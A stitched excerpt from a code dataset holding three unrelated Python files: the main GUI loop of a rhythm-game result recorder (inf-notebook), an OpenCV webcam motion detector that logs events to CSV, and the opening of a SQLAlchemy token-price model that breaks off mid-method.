            screenshot.xy = (rect.left, rect.top)
        screen = screenshot.get_screen()
        if screen != self.screen_latest:
            self.screen_latest = screen
        if screen == 'loading':
            # Entering a song: reset per-result flags and poll slowly.
            if not self.waiting:
                self.confirmed_result = False
                self.confirmed_savable = False
                self.processed_result = False
                self.waiting = True
                self.queues['log'].put('find loading: start waiting')
                self.sleep_time = thread_time_wait_loading
            return
        if self.waiting:
            self.waiting = False
            self.queues['log'].put('lost loading: end waiting')
            self.sleep_time = thread_time_normal
        shotted = False
        if display_screenshot_enable:
            screenshot.shot()
            shotted = True
            self.queues['display_image'].put(screenshot.get_image())
        if screen != 'result':
            self.confirmed_result = False
            self.confirmed_savable = False
            self.processed_result = False
            return
        if not self.confirmed_result:
            # First sight of the result screen: poll faster to catch it settled.
            self.confirmed_result = True
            self.sleep_time = thread_time_result
        if self.processed_result:
            return
        if not shotted:
            screenshot.shot()
        if not recog.get_is_savable(screenshot.np_value):
            return
        if not self.confirmed_savable:
            # Debounce: require the savable state to persist before capturing.
            self.confirmed_savable = True
            self.find_time = time.time()
            return
        if time.time() - self.find_time <= thread_time_normal*2-0.1:
            return
        resultscreen = screenshot.get_resultscreen()
        # NOTE(review): `self.processed` is not read anywhere in this file's
        # visible code and looks like a leftover of `processed_result`;
        # kept in case code outside this chunk inspects it — verify.
        self.processed = True
        self.queues['result_screen'].put(resultscreen)
        self.sleep_time = thread_time_normal
        self.processed_result = True
class Selection():
    """Tracks the chart currently selected in the UI (play mode /
    difficulty / music / its notebook) and which view of it is shown:
    a recent result, the score graph, a filtered image, or a specific
    timestamped result."""

    def __init__(self, play_mode, difficulty, music, notebook):
        self.play_mode = play_mode
        self.difficulty = difficulty
        self.music = music
        self.notebook = notebook
        # No view chosen yet.
        self._clear_viewflags()
        self.timestamp = None

    def _clear_viewflags(self):
        # Internal helper: reset every display-mode flag.
        self.recent = False
        self.filtered = False
        self.graph = False

    def selection_recent(self, timestamp):
        """Mark the selection as coming from the recent-results table."""
        self._clear_viewflags()
        self.recent = True
        self.timestamp = timestamp

    def selection_graph(self):
        """Switch to graph view; returns False when no music is selected."""
        if self.music is None:
            return False
        self._clear_viewflags()
        self.graph = True
        self.timestamp = None
        return True

    def selection_timestamp(self, timestamp):
        """Point the selection at one specific past result."""
        self._clear_viewflags()
        self.timestamp = timestamp

    def selection_filtered(self):
        """Note that the blurred (filtered) image is now displayed."""
        self.filtered = True
        self.graph = False

    def get_targetrecordlist(self):
        """Record list for the selected chart from the music notebook."""
        return self.notebook.get_recordlist(self.play_mode, self.difficulty)
def result_process(screen):
    """Handle a newly captured result screen: recognize, upload, save, record.

    Args:
        screen (Screen): captured result screen (see screen.py).
    """
    result = recog.get_result(screen)
    if result is None:
        return

    resultimage = screen.original

    # Upload to the collection when data collection is enabled or forced.
    if setting.data_collection or window['force_upload'].get():
        if storage.upload_collection(result, resultimage, window['force_upload'].get()):
            timestamps_uploaded.append(result.timestamp)

    # Optionally ignore results that set no new record.
    if setting.newrecord_only and not result.has_new_record():
        return

    if setting.play_sound:
        play_sound_result()

    images_result[result.timestamp] = resultimage

    saved = False
    if setting.autosave:
        save_result(result, resultimage)
        saved = True

    filtered = False
    if setting.autosave_filtered:
        save_filtered(
            resultimage,
            result.timestamp,
            result.informations.music,
            result.play_side,
            result.rival,
            result.details.graphtarget == 'rival'
        )
        filtered = True

    # Record in the "recent" notebook regardless of recognition success.
    notebook_recent.append(result, saved, filtered)
    notebook_recent.save()

    music = result.informations.music
    if music is not None:
        # Lazily create/load the per-music notebook.
        if music in notebooks_music.keys():
            notebook = notebooks_music[music]
        else:
            # NOTE(review): the inner `if music is not None` is redundant
            # here (guarded by the enclosing branch).
            notebook = NotebookMusic(music) if music is not None else None
            notebooks_music[music] = notebook
        # Failed plays are only recorded when they still set a record.
        if not result.dead or result.has_new_record():
            notebook.insert(result)
            notebook.save()

    if not result.dead or result.has_new_record():
        recent.insert(result)

    insert_results(result)
def save_result(result, image):
    """Save a result image to disk once; remember its timestamp on success.

    Shows an error dialog (and logs) when writing fails.
    """
    if result.timestamp in timestamps_saved:
        return

    ret = None
    try:
        music = result.informations.music
        ret = result_save(image, music, result.timestamp, setting.imagesave_path, setting.savefilemusicname_right)
    except Exception as ex:
        logger.exception(ex)
        gui.error_message(u'保存の失敗', u'リザルトの保存に失敗しました。', ex)
        return

    if ret:
        timestamps_saved.append(result.timestamp)
        log_debug(f'save result: {ret}')
def save_filtered(resultimage, timestamp, music, play_side, loveletter, rivalname):
    """Blur rival-identifying regions of a result image and save it.

    The blurred image is cached in `images_filtered` on success; shows an
    error dialog (and logs) when writing fails.

    Args:
        resultimage (Image): source result image (PIL).
        timestamp (str): timestamp of the result.
        music (str): music title.
        play_side (str): '1P' or '2P'.
        loveletter (bool): whether a rival challenge letter is shown.
        rivalname (bool): whether the graph target shows a rival name.

    Returns:
        None.  (The blurred image is stored in `images_filtered`, not returned.)
    """
    filteredimage = filter_result(resultimage, play_side, loveletter, rivalname)

    ret = None
    try:
        ret = result_savefiltered(filteredimage, music, timestamp, setting.imagesave_path, setting.savefilemusicname_right)
    except Exception as ex:
        logger.exception(ex)
        gui.error_message(u'保存の失敗', u'リザルトの保存に失敗しました。', ex)
        return

    if ret:
        images_filtered[timestamp] = filteredimage
        log_debug(f'save filtered result: {ret}')
def insert_recentnotebook_results():
    """Populate the results table from the persisted "recent" notebook.

    Newest entries end up on top (each is inserted at index 0).
    Unrecognized fields are shown as '??????' / '???'.
    """
    for timestamp in notebook_recent.timestamps:
        target = notebook_recent.get_result(timestamp)
        playmode = target['play_mode']
        difficulty = target['difficulty']
        list_results.insert(0, [
            '☑' if target['saved'] else '',
            '☑' if target['filtered'] else '',
            timestamp,
            target['music'] if target['music'] is not None else '??????',
            f'{playmode}{difficulty[0]}' if playmode is not None and difficulty is not None else '???',
            '☑' if target['clear_type_new'] else '',
            '☑' if target['dj_level_new'] else '',
            '☑' if target['score_new'] else '',
            '☑' if target['miss_count_new'] else ''
        ])
    refresh_table()
def insert_results(result):
    """Prepend one freshly recognized result to the table and today's cache.

    Trims the table to `recent_maxcount` rows and shifts the remembered
    selection indices so the same rows stay selected.
    """
    global table_selected_rows

    results_today[result.timestamp] = result

    play_mode = result.informations.play_mode
    difficulty = result.informations.difficulty
    music = result.informations.music
    list_results.insert(0, [
        '☑' if result.timestamp in timestamps_saved else '',
        '☑' if result.timestamp in images_filtered.keys() else '',
        result.timestamp,
        music if music is not None else '??????',
        f'{play_mode}{difficulty[0]}' if play_mode is not None and difficulty is not None else '???',
        '☑' if result.details.clear_type.new else '',
        '☑' if result.details.dj_level.new else '',
        '☑' if result.details.score.new else '',
        '☑' if result.details.miss_count.new else ''
    ])

    # Keep at most recent_maxcount rows (drop the oldest).
    while len(list_results) > recent_maxcount:
        del list_results[-1]

    # Selections move down by one because a row was inserted at the top.
    table_selected_rows = [v + 1 for v in table_selected_rows]
    refresh_table(setting.display_result)
def update_resultflag(row_index, saved=False, filtered=False):
    # Tick the "saved" / "filtered" checkbox columns of one table row.
    if saved:
        list_results[row_index][0] = '☑'
    if filtered:
        list_results[row_index][1] = '☑'

def refresh_table(select_newest=False):
    # Push list_results into the GUI table; select row 0 (the newest result)
    # when select_newest, otherwise restore the remembered selection.
    if select_newest:
        window['table_results'].update(values=list_results, select_rows=[0])
    else:
        window['table_results'].update(values=list_results, select_rows=table_selected_rows)
def clear_tableselection():
    """Deselect every row of the recent-results table.

    Bug fix: without the `global` declaration the assignment created a
    *local* `table_selected_rows`, so the module-level selection list kept
    its stale contents and a later refresh_table() re-selected old rows.
    (Sibling functions such as insert_results() do declare it global.)
    """
    global table_selected_rows
    table_selected_rows = []
    window['table_results'].update(select_rows=table_selected_rows)
def active_screenshot():
    # Hotkey handler (alt+F10): take an on-demand screenshot, save the raw
    # image and show it in the GUI together with its relative file path.
    if not screenshot.shot():
        return

    image = screenshot.get_image()
    if image is not None:
        filepath = save_raw(image)
        log_debug(f'save screen: {filepath}')
        gui.display_image(get_imagevalue(image))
        window['screenshot_filepath'].update(join(pardir, filepath))
def log_debug(message):
    """Log at DEBUG level; echo to stdout as well when in manage mode."""
    logger.debug(message)
    if not setting.manage:
        return
    print(message)
def get_latest_version():
    """Fetch the latest release version string from GitHub.

    The /releases/latest URL redirects to the tagged release; the tag is
    the last path segment.  Returns the version without the leading 'v',
    or None when the tag does not start with 'v'.
    """
    with request.urlopen(latest_url) as response:
        url = response.geturl()
        version = url.split('/')[-1]
        print(f'released latest version: {version}')
        if version[0] == 'v':
            return version.removeprefix('v')
        else:
            return None
def check_resource():
    """Download updated recognition resources (if any) and reload them.

    Runs in a background thread at startup; `check_latest` returns True
    when a newer resource file was fetched from storage.
    """
    informations_filename = f'{define.informations_resourcename}.res'
    if check_latest(storage, informations_filename):
        resource.load_resource_informations()

    details_filename = f'{define.details_resourcename}.res'
    if check_latest(storage, details_filename):
        resource.load_resource_details()

    musictable_filename = f'{define.musictable_resourcename}.res'
    if check_latest(storage, musictable_filename):
        resource.load_resource_musictable()
        gui.update_musictable()
def select_result_recent():
    """Handle a selection change in the recent-results table.

    Only a single-row selection is displayed.  Builds a Selection for the
    row's chart, shows the result image (today's cache or loaded from
    disk), and fills the search widgets / record panel when the music was
    recognized.

    Returns:
        Selection | None: the new selection, or None for 0/многих rows.
    """
    if len(table_selected_rows) == 0:
        return None

    window['music_candidates'].update(set_to_index=[])

    if len(table_selected_rows) != 1:
        return None

    timestamp = list_results[table_selected_rows[0]][2]
    target = notebook_recent.get_result(timestamp)

    # Lazily create/load the per-music notebook for a recognized title.
    if target['music'] is not None:
        if target['music'] in notebooks_music.keys():
            notebook = notebooks_music[target['music']]
        else:
            notebook = NotebookMusic(target['music'])
            notebooks_music[target['music']] = notebook
    else:
        notebook = None

    ret = Selection(
        target['play_mode'],
        target['difficulty'],
        target['music'],
        notebook
    )
    ret.selection_recent(timestamp)

    if timestamp in results_today.keys():
        display_today(ret)
    else:
        display_history(ret)

    if ret.notebook is not None:
        # Mirror the selection into the play-mode/difficulty/search widgets.
        if ret.play_mode == 'SP':
            window['play_mode_sp'].update(True)
        if ret.play_mode == 'DP':
            window['play_mode_dp'].update(True)
        window['difficulty'].update(ret.difficulty)
        window['search_music'].update(target['music'])
        targetrecordlist = ret.get_targetrecordlist()
        gui.display_record(targetrecordlist)
        gui.display_historyresult(targetrecordlist, timestamp)
    else:
        gui.display_record(None)

    return ret
def select_music_search():
    """Handle picking a music from the search candidates list.

    Requires exactly one candidate plus a chosen play mode and difficulty.
    Clears the table selection, loads the music's notebook and shows its
    record list and score graph.

    Returns:
        Selection | None: the new selection, or None when input is incomplete
        or the chart has no records.
    """
    if len(values['music_candidates']) != 1:
        return None

    play_mode = None
    if values['play_mode_sp']:
        play_mode = 'SP'
    if values['play_mode_dp']:
        play_mode = 'DP'
    if play_mode is None:
        return None

    difficulty = values['difficulty']
    if difficulty == '':
        return None

    music = values['music_candidates'][0]

    clear_tableselection()

    # Lazily create/load the per-music notebook.
    if music in notebooks_music.keys():
        notebook = notebooks_music[music]
    else:
        notebook = NotebookMusic(music)
        notebooks_music[music] = notebook

    targetrecordlist = notebook.get_recordlist(play_mode, difficulty)
    if targetrecordlist is None:
        gui.display_record(None)
        gui.display_image(None)
        return None

    ret = Selection(play_mode, difficulty, music, notebook)
    gui.display_record(targetrecordlist)
    create_graph(ret, targetrecordlist)

    return ret
def select_history():
    """Handle picking one timestamp from the history list.

    Updates the current Selection to that timestamp and shows the matching
    result image (today's cache or loaded from disk).
    """
    if len(values['history']) != 1:
        return

    clear_tableselection()

    timestamp = values['history'][0]
    selection.selection_timestamp(timestamp)
    gui.display_historyresult(selection.get_targetrecordlist(), timestamp)
    if timestamp in results_today.keys():
        display_today(selection)
    else:
        display_history(selection)
def load_resultimages(timestamp, music, recent=False):
    """Load the saved result image (and blurred variant) from disk into caches.

    For recent entries the filtered image is only cached when the plain
    image is missing or the filtered one exists, so a later filter() call
    can still generate it.
    """
    image_result = get_resultimage(music, timestamp, setting.imagesave_path)
    images_result[timestamp] = image_result
    if image_result is not None:
        timestamps_saved.append(timestamp)

    image_filtered = get_filteredimage(music, timestamp, setting.imagesave_path)
    if not recent or image_result is None or image_filtered is not None:
        images_filtered[timestamp] = image_filtered
def display_today(selection):
    """Show the in-memory result image for a result captured today.

    The PySimpleGUI image value is cached per timestamp to avoid
    re-encoding the PIL image on every selection.
    """
    if selection.timestamp in imagevalues_result.keys():
        resultimage = imagevalues_result[selection.timestamp]
    else:
        resultimage = get_imagevalue(images_result[selection.timestamp])
        imagevalues_result[selection.timestamp] = resultimage
    gui.display_image(resultimage, result=True)
def display_history(selection):
    """Show a past result's image, preferring the plain image over the blurred one.

    Loads images from disk on first access; when only the blurred image
    exists the selection is marked as filtered.
    """
    if not selection.timestamp in images_result.keys():
        load_resultimages(selection.timestamp, selection.music, selection.timestamp in notebook_recent.timestamps)

    if selection.timestamp in imagevalues_result.keys():
        imagevalue_result = imagevalues_result[selection.timestamp]
    else:
        imagevalue_result = get_imagevalue(images_result[selection.timestamp]) if selection.timestamp in images_result.keys() and images_result[selection.timestamp] is not None else None
        imagevalues_result[selection.timestamp] = imagevalue_result

    if imagevalue_result is not None:
        gui.display_image(imagevalue_result, result=True)
    else:
        # Fall back to the blurred image when the plain one is unavailable.
        if selection.timestamp in imagevalues_filtered.keys():
            imagevalue_filtered = imagevalues_filtered[selection.timestamp]
        else:
            imagevalue_filtered = get_imagevalue(images_filtered[selection.timestamp]) if selection.timestamp in images_filtered.keys() and images_filtered[selection.timestamp] is not None else None
            imagevalues_filtered[selection.timestamp] = imagevalue_filtered
        gui.display_image(imagevalue_filtered, result=True)
        if imagevalue_filtered is not None:
            selection.selection_filtered()
def save():
    """Save what is currently selected.

    Recent-table selection: write every selected today's result image to
    disk and tick its "saved" flag.  Graph view: write the graph image.
    """
    if selection.recent:
        for row_index in table_selected_rows:
            timestamp = list_results[row_index][2]
            if timestamp in results_today.keys() and not timestamp in timestamps_saved:
                save_result(results_today[timestamp], images_result[timestamp])
                notebook_recent.get_result(timestamp)['saved'] = True
                update_resultflag(row_index, saved=True)
        notebook_recent.save()
        refresh_table()
    if selection.graph:
        save_graphimage(selection.music, images_graph[selection.music], setting.imagesave_path, setting.savefilemusicname_right)
def filter():
    """Blur the rival areas of a result image and display the blurred version.

    (Note: intentionally shadows the builtin `filter`; it is bound by name
    as a GUI action elsewhere, so it is not renamed here.)

    When selecting from the recent-results table:
        Apply the blur to every selected result.  For results not from
        today this only works when the plain result image was saved to disk.
    When selecting via music search:
        If the result is also in the recent table the blur cannot be
        applied here (its table index is unknown); only check whether a
        blurred image already exists and display it if so.
    """
    if selection.recent:
        updated = False
        for row_index in table_selected_rows:
            timestamp = list_results[row_index][2]
            target = notebook_recent.get_result(timestamp)
            if not timestamp in images_result.keys():
                load_resultimages(timestamp, target['music'], True)
            if images_result[timestamp] is not None and not timestamp in images_filtered.keys():
                save_filtered(
                    images_result[timestamp],
                    timestamp,
                    target['music'],
                    target['play_side'],
                    target['has_loveletter'],
                    target['has_graphtargetname']
                )
                target['filtered'] = True
                update_resultflag(row_index, filtered=True)
                updated = True
        if updated:
            notebook_recent.save()
            refresh_table()
    else:
        if not selection.timestamp in images_result.keys() and not selection.timestamp in notebook_recent.timestamps:
            load_resultimages(selection.timestamp, selection.music)
        if selection.timestamp in imagevalues_filtered.keys():
            imagevalue = imagevalues_filtered[selection.timestamp]
        else:
            filteredimage = images_filtered[selection.timestamp] if selection.timestamp in images_filtered.keys() else None
            imagevalue = get_imagevalue(filteredimage) if filteredimage is not None else None
            if imagevalue is not None:
                imagevalues_filtered[selection.timestamp] = imagevalue
        if imagevalue is not None:
            gui.display_image(imagevalue, result=True)
            selection.selection_filtered()
def upload():
    """Force-upload the selected today's results to the collection storage.

    Only available for recent-table selections; asks for confirmation first
    (this is the misrecognized-title report path).
    """
    if not selection.recent:
        return

    if not gui.question('確認', upload_confirm_message):
        return

    for row_index in table_selected_rows:
        timestamp = list_results[row_index][2]
        if timestamp in results_today.keys() and not timestamp in timestamps_uploaded:
            storage.upload_collection(results_today[timestamp], images_result[timestamp], True)
            timestamps_uploaded.append(timestamp)
def open_folder_results():
    # Open the saved-results folder in the file manager; dialog on failure.
    ret = openfolder_results(setting.imagesave_path)
    if ret is not None:
        logger.exception(ret)
        gui.error_message(u'失敗', u'フォルダを開くのに失敗しました。', ret)

def open_folder_filtereds():
    # Open the blurred-images folder in the file manager; dialog on failure.
    ret = openfolder_filtereds(setting.imagesave_path)
    if ret is not None:
        logger.exception(ret)
        gui.error_message(u'失敗', u'フォルダを開くのに失敗しました。', ret)

def open_folder_graphs():
    # Open the graph-images folder in the file manager; dialog on failure.
    ret = openfolder_graphs(setting.imagesave_path)
    if ret is not None:
        logger.exception(ret)
        gui.error_message(u'失敗', u'フォルダを開くのに失敗しました。', ret)
def tweet():
    """Compose a tweet about the selected result(s) and open the intent URL.

    With table rows selected, one template line per result is built
    (play mode/difficulty, title, best-update info, play option); otherwise
    a single line for the searched chart.  The text plus hashtags is
    URL-encoded and opened in the default browser.
    """
    if len(values['table_results']) > 0:
        musics_text = []
        # Reversed so the oldest selected result comes first in the tweet.
        for index in reversed(values['table_results']):
            result = notebook_recent.get_result(list_results[index][2])
            music = result['music']
            music = music if music is not None else '??????'
            text = tweet_template_music
            text = text.replace('&&play_mode&&', result['play_mode'])
            text = text.replace('&&D&&', result['difficulty'][0])
            text = text.replace('&&music&&', music)
            # Priority for the "update" note: lamp/DJ level > score > miss count.
            if result['update_clear_type'] is not None or result['update_dj_level'] is not None:
                text = text.replace('&&update&&', ' '.join(v for v in [result['update_clear_type'], result['update_dj_level']] if v is not None))
            else:
                if result['update_score'] is not None:
                    text = text.replace('&&update&&', f"自己ベスト+{result['update_score']}")
                else:
                    if result['update_miss_count'] is not None:
                        text = text.replace('&&update&&', f"ミスカウント{result['update_miss_count']}")
                    else:
                        text = text.replace('&&update&&', '')
            # Empty option string means the regular (正規) arrangement.
            if result['option'] is not None:
                if result['option'] == '':
                    text = text.replace('&&option&&', '(正規)')
                else:
                    text = text.replace('&&option&&', f"({result['option']})")
            else:
                text = text.replace('&&option&&', '')
            musics_text.append(text)
        music_text = '\n'.join(musics_text)
    else:
        if len(values['music_candidates']) == 1:
            music_text = tweet_template_music
            music_text = music_text.replace('&&play_mode&&', selection.play_mode)
            if selection.music is not None:
                music_text = music_text.replace('&&music&&', selection.music)
            else:
                music_text = music_text.replace('&&music&&', '?????')
            music_text = music_text.replace('&&D&&', selection.difficulty[0])
            music_text = music_text.replace('&&update&&', '')
            music_text = music_text.replace('&&option&&', '')
        else:
            music_text = ''

    text = quote('\n'.join((music_text, tweet_template_hashtag)))
    url = f'{tweet_url}?text={text}'
    webbrowser.open(url)
def delete_record():
    """Delete the whole notebook of the currently selected music.

    Removes the cached notebook, deletes its file, then refreshes the
    search candidates and clears the record/image panels.
    """
    if selection is None:
        return

    if selection.music in notebooks_music.keys():
        del notebooks_music[selection.music]
    selection.notebook.delete()
    gui.search_music_candidates()
    gui.display_record(None)
    gui.display_image(None)
def delete_targetrecord():
    """Delete only the selected timestamp's entry from the music notebook."""
    if selection is None:
        return

    if selection.timestamp is None:
        return

    selection.notebook.delete_history(
        selection.play_mode,
        selection.difficulty,
        selection.timestamp
    )
    gui.display_record(selection.get_targetrecordlist())
    gui.display_image(None)
def create_graph(selection, targetrecord):
    """Render the score-history graph for the selected chart and display it.

    Caches the graph image per music and switches the selection into
    graph view on success.
    """
    graphimage = create_graphimage(selection.play_mode, selection.difficulty, selection.music, targetrecord)
    if graphimage is None:
        return

    images_graph[selection.music] = graphimage
    imagevalue = get_imagevalue(graphimage)
    gui.display_image(imagevalue, graph=True)
    selection.selection_graph()
def rename_all_musicnotebooks():
    """Rename every music notebook file to the current naming scheme.

    Skipped while the resource informations have not been loaded yet.
    """
    if resource.informations is None:
        return
    rename_allfiles(resource.musictable['musics'].keys())
if __name__ == '__main__':
    # Global hotkey for taking a screenshot of the capture area.
    keyboard.add_hotkey('alt+F10', active_screenshot)
    window = gui.generate_window(setting, version)
    # --- per-session state ---
    display_screenshot_enable = False
    screenshot = Screenshot()
    notebook_recent = NotebookRecent(recent_maxcount)
    notebooks_music = {}
    results_today = {}
    timestamps_saved = []
    timestamps_uploaded = []
    images_result = {}
    images_filtered = {}
    imagevalues_result = {}
    imagevalues_filtered = {}
    images_graph = {}
    selection = None
    recent = Recent()
    list_results = []
    table_selected_rows = []
    # Queues used by the background thread to talk to the GUI loop.
    queue_log = Queue()
    queue_display_image = Queue()
    queue_result_screen = Queue()
    storage = StorageAccessor()
    event_close = Event()
    thread = ThreadMain(
        event_close,
        queues = {
            'log': queue_log,
            'display_image': queue_display_image,
            'result_screen': queue_result_screen
        }
    )
    music_search_time = None
    # First run: ask whether anonymized result data may be collected.
    if not setting.has_key('data_collection'):
        setting.data_collection = gui.collection_request('resources/annotation.png')
        setting.save()
    if setting.data_collection:
        window['button_upload'].update(visible=True)
    # '0.0.0.0' marks a development build, which skips the version check.
    if version != '0.0.0.0' and get_latest_version() != version:
        gui.find_latest_version(latest_url)
    if not setting.ignore_download:
        Thread(target=check_resource).start()
    # Workaround for a bug that existed before version 0.7.0.1.
    rename_all_musicnotebooks()
    insert_recentnotebook_results()
    # --- main GUI event loop (50 ms tick) ---
    while True:
        event, values = window.read(timeout=50, timeout_key='timeout')
        try:
            if event in (sg.WIN_CLOSED, sg.WINDOW_CLOSE_ATTEMPTED_EVENT):
                # Stop the background thread before leaving the loop.
                if not thread is None:
                    event_close.set()
                    thread.join()
                log_debug(f'end')
                break
            # --- checkbox settings ---
            if event == 'check_display_screenshot':
                display_screenshot_enable = values['check_display_screenshot']
            if event == 'check_display_result':
                setting.display_result = values['check_display_result']
            if event == 'check_newrecord_only':
                setting.newrecord_only = values['check_newrecord_only']
            if event == 'check_autosave':
                setting.autosave = values['check_autosave']
            if event == 'check_autosave_filtered':
                setting.autosave_filtered = values['check_autosave_filtered']
            if event == 'check_display_music':
                setting.display_music = values['check_display_music']
                gui.switch_table(setting.display_music)
            if event == 'check_play_sound':
                setting.play_sound = values['check_play_sound']
            if event == 'check_savefilemusicname_right':
                setting.savefilemusicname_right = values['check_savefilemusicname_right']
            # Manually loading a result screenshot from disk.
            if event == 'text_file_path':
                if exists(values['text_file_path']):
                    screen = open_screenimage(values['text_file_path'])
                    gui.display_image(get_imagevalue(screen.original))
                    if recog.get_is_savable(screen.np_value):
                        result_process(screen)
            # --- buttons ---
            if event == 'button_setting':
                open_setting(setting)
                window['button_upload'].update(visible=setting.data_collection)
            if event == 'button_save':
                save()
            if event == 'button_filter':
                filter()
            if event == 'button_open_folder_results':
                open_folder_results()
            if event == 'button_open_folder_filtereds':
                open_folder_filtereds()
            if event == 'button_open_folder_graphs':
                open_folder_graphs()
            if event == 'button_tweet':
                tweet()
            if event == 'button_export':
                open_export(recent)
            if event == 'button_upload':
                upload()
            # Selecting a row in the recent-results table.
            if event == 'table_results':
                if values['table_results'] != table_selected_rows:
                    table_selected_rows = values['table_results']
                    selection_result = select_result_recent()
                    if selection_result is not None:
                        selection = selection_result
                        if selection.music is not None:
                            window['music_candidates'].update([selection.music], set_to_index=[0])
                        else:
                            window['music_candidates'].update(set_to_index=[])
            if event == 'button_graph':
                if selection is not None and selection.music is not None:
                    create_graph(selection, selection.get_targetrecordlist())
            if event == 'category_versions':
                gui.search_music_candidates()
            # Debounce: re-run the search one second after the last keystroke.
            if event == 'search_music':
                music_search_time = time.time() + 1
            if event in ['play_mode_sp', 'play_mode_dp', 'difficulty', 'music_candidates']:
                selection_result = select_music_search()
                if selection_result is not None:
                    selection = selection_result
            # Context-menu entry: delete the selected music's records.
            if event == '選択した曲の記録を削除する':
                delete_record()
                selection = None
            if event == 'history':
                select_history()
            # Context-menu entry: delete the selected result only.
            if event == '選択したリザルトの記録を削除する':
                delete_targetrecord()
            if event == 'button_best_switch':
                gui.switch_best_display()
            # --- periodic housekeeping on every 50 ms timeout tick ---
            if event == 'timeout':
                if not window['positioned'].visible and thread.handle:
                    window['positioned'].update(visible=True)
                if window['positioned'].visible and not thread.handle:
                    window['positioned'].update(visible=False)
                if not window['captureenable'].visible and screenshot.xy:
                    window['captureenable'].update(visible=True)
                if window['captureenable'].visible and not screenshot.xy:
                    window['captureenable'].update(visible=False)
                if music_search_time is not None and time.time() > music_search_time:
                    music_search_time = None
                    gui.search_music_candidates()
                if not queue_log.empty():
                    log_debug(queue_log.get_nowait())
                if not queue_display_image.empty():
                    clear_tableselection()
                    window['music_candidates'].update(set_to_index=[])
                    selection = None
                    gui.display_image(get_imagevalue(queue_display_image.get_nowait()))
                if not queue_result_screen.empty():
                    result_process(queue_result_screen.get_nowait())
        except Exception as ex:
            # Keep the GUI alive on unexpected handler errors; just log them.
            log_debug(ex)
    window.close()
    del screenshot
| kaktuswald/inf-notebook | main.pyw | main.pyw | pyw | 34,382 | python | en | code | 4 | github-code | 36 |
1522352511 | import cv2, time, pandas
from datetime import datetime

# --- motion-detection state ---
firstFrame = None          # reference background frame (grayscale, blurred)
statusList = [None, None]  # motion flag of the two most recent frames (1/0)
times = []                 # event log: [enter_time, exit_time, exit_area, ...]
contourCount = []          # per-frame contour area once motion has first occurred
frameCount = []            # x-axis indices matching the smoothed plot data
avgContour = []            # smoothed (window-averaged, squared) contour areas
contCStart = 0             # becomes 1 after the first large motion is seen
lastContour = None         # most recent contour large enough to count as motion

video = cv2.VideoCapture(0, cv2.CAP_DSHOW)

while True:
    check, frame = video.read()
    if not check:
        # Camera disconnected or delivered no frame: stop cleanly instead of
        # crashing inside cvtColor.
        break
    status = 0
    # Grayscale + blur so small sensor noise does not register as motion.
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    gray = cv2.GaussianBlur(gray, (21, 21), 0)
    # The very first frame becomes the static background reference.
    if firstFrame is None:
        firstFrame = gray
        continue
    delta = cv2.absdiff(firstFrame, gray)
    # Threshold the difference image and find the contours of moving areas.
    threshFrame = cv2.threshold(delta, 30, 255, cv2.THRESH_BINARY)[1]
    threshFrame = cv2.dilate(threshFrame, None, iterations=2)
    (cnts, _) = cv2.findContours(threshFrame.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    # Contours above 5000 px^2 count as motion and get a bounding box.
    for contour in cnts:
        if cv2.contourArea(contour) < 5000:
            if contCStart == 1:  # keep the series aligned once recording began
                contourCount.append(0)
            continue
        status = 1
        contCStart = 1
        lastContour = contour  # remember the moving object's contour
        contourCount.append(cv2.contourArea(contour))
        (x, y, w, h) = cv2.boundingRect(contour)
        cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 3)
    statusList.append(status)
    statusList = statusList[-2:]  # only the last two frames matter
    # 0 -> 1 transition: something entered the frame.
    if statusList[-1] == 1 and statusList[-2] == 0:
        times.append(datetime.now())
    # 1 -> 0 transition: it left; record the time and the moving object's
    # last contour area (the original used the loop-leaked `contour`, which
    # could be any small contour of the current frame).
    if statusList[-1] == 0 and statusList[-2] == 1:
        times.append(datetime.now())
        times.append(cv2.contourArea(lastContour))
    # Show the intermediate images and the annotated original.
    cv2.imshow("Capturing", gray)
    cv2.imshow("Delta", delta)
    cv2.imshow("Threshold", threshFrame)
    cv2.imshow("Color Frame", frame)
    key = cv2.waitKey(100)
    if key == ord('q'):
        if status == 1:  # close the still-open motion event before quitting
            times.append(datetime.now())
            times.append(cv2.contourArea(lastContour))
        break

# Persist the enter/exit events (stored in triples) as a CSV.
# DataFrame.append was deprecated/removed in pandas; build the rows first.
events = [
    {"Start": times[i], "End": times[i + 1], "ExitArea": times[i + 2]}
    for i in range(0, len(times), 3)
]
df = pandas.DataFrame(events, columns=["Start", "End", "ExitArea"])
df.to_csv("Times.csv")

# Smooth the contour series: average windows of 10 samples, then square the
# average to accentuate changes.  The original wrote `int(y/count)^2`, where
# '^' is bitwise XOR in Python, not exponentiation — fixed to '** 2'.
z = 0
x = 0
y = 0
count = 1
while x < len(contourCount):
    while z < x + 10:
        if z < len(contourCount):
            y = contourCount[z] + y
            z = z + 1
            count = count + 1
        else:
            z = x + 50  # past the end: force the inner loop to stop
    avgContour.append(float(int(y / count) ** 2))
    y = 0
    x = x + 10
    z = z + 1
    count = 1

# x-axis values matching the smoothed series.
frameCount = list(range(len(avgContour)))

video.release()
cv2.destroyAllWindows()
| Caseyar95/MotionDetectingWebcam | VideoCapture2.py | VideoCapture2.py | py | 3,169 | python | en | code | 0 | github-code | 36 |
9036950970 | from datetime import datetime
from sqlalchemy import Column, String, Integer, Float, DateTime, select, delete
from sqlalchemy.exc import IntegrityError, NoResultFound
from sqlalchemy.ext.asyncio import AsyncSession
from app.services.database import Base
class TokenInfo(Base):
    """ORM model for a snapshot of a token's market data at a point in time.

    One row per (created_at, symbol) pair, so repeated snapshots of the same
    token are kept as separate rows.
    """
    __tablename__ = "TokenInfo"
    # Composite primary key: snapshot timestamp + token symbol.
    created_at = Column(DateTime, primary_key=True)
    symbol = Column(String, primary_key=True)
    rank = Column(Integer, nullable=False)
    price = Column(Float, nullable=True)
    @classmethod
    async def create(cls, db: AsyncSession, **kwargs):
        """Insert a new TokenInfo row, commit, and return the refreshed instance."""
        transaction = cls(**kwargs)
        db.add(transaction)
        await db.commit()
        await db.refresh(transaction)
        return transaction
    @classmethod
    async def delete_timestamp(cls, db: AsyncSession, created_at: datetime):
        """Delete every row recorded at *created_at* and commit.

        NOTE(review): this returns the Delete statement object, not the
        execution result — the rows requested via `.returning(...)` are
        discarded.  Confirm callers do not rely on the returned value.
        """
        transaction = delete(cls).where(
            cls.created_at==created_at
        ).returning(cls.symbol, cls.created_at)
